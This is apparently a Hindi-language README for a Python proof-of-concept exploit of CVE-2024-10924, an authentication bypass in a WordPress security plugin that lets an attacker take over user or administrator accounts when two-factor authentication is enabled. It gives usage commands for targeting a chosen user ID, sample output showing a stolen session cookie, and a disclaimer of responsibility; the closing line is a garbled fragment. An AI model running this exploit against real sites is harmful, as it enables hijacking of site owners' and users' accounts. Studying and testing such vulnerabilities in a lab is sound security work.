
CVE-2024-10924 के लिए Python में लिखा गया POC
Really Simple Plugins WordPress प्लगइन (9.0.0 से 9.1.1.1 तक के संस्करण शामिल) के REST API में एक त्रुटि-प्रबंधन दोष किसी हमलावर को, जब दो-कारक प्रमाणीकरण सक्षम हो, प्रमाणीकरण को बायपास करने और किसी मौजूदा उपयोगकर्ता या व्यवस्थापक खाते का नियंत्रण लेने की अनुमति देता है।
चूँकि मैं एक अच्छा इंसान हूँ, आपको प्लगइन का संस्करण 9.1.1.1 भी मिलेगा। बस इसे अनज़िप करें और wp-content/plugins फ़ोल्डर में अपलोड करें। प्लगइन को सक्रिय करना और 2FA सक्षम करना न भूलें।
आवश्यक निर्भरताएँ pip का उपयोग करके स्थापित करें:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
विशिष्ट उपयोगकर्ता ID के साथ:
python exploit.py -id 10 http://localhost:8886/
यह उपयोगकर्ता ID 10 के साथ एक्सप्लॉइट पेलोड भेजता है।
उपयोगकर्ता ID निर्दिष्ट किए बिना:
python exploit.py http://localhost
उपयोगकर्ता ID को डिफ़ॉल्ट रूप से 1 पर सेट करता है।
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) केवल तभी अक्षम करें जब परीक्षण के लिए आवश्यक हो।मुझे नहीं पता लेकिन मैं किसी भी चीज़ के लिए ज़िम्मेदार नहीं हूँ।